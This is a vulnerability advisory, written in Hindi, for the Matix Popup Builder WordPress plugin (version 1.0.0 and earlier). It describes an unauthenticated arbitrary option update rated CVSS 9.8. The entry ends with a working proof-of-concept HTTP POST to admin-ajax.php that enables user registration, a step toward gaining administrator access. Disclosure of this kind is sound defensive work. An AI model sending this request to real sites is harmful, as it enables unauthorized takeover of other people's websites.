
Matix Popup Builder <= 1.0.0 - अप्रमाणित मनमाना विकल्प अद्यतन
WordPress के लिए Matix Popup Builder प्लगइन 1.0.0 तक के सभी संस्करणों में एक फ़ंक्शन पर क्षमता जाँच (capability check) की कमी के कारण डेटा में अनधिकृत संशोधन संभव है, जो विशेषाधिकार वृद्धि (privilege escalation) का कारण बन सकता है। इससे अनधिकृत हमलावर WordPress साइट पर मनमाने विकल्पों (options) को अद्यतन कर सकते हैं। इसका उपयोग पंजीकरण के लिए डिफ़ॉल्ट भूमिका को व्यवस्थापक (administrator) में बदलने और उपयोगकर्ता पंजीकरण सक्षम करने के लिए किया जा सकता है, जिससे हमलावर एक असुरक्षित साइट पर व्यवस्थापकीय उपयोगकर्ता पहुँच प्राप्त कर सकते हैं।
Score: 9.8
Vendors: Medma Technologies
Products: Matix Popup Builder
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Interaction: none
Privileges: none
Attack Vector: network
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=4
Te: trailers
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
action=medma_mtx_insertContentValue&option_name=users_can_register&content=1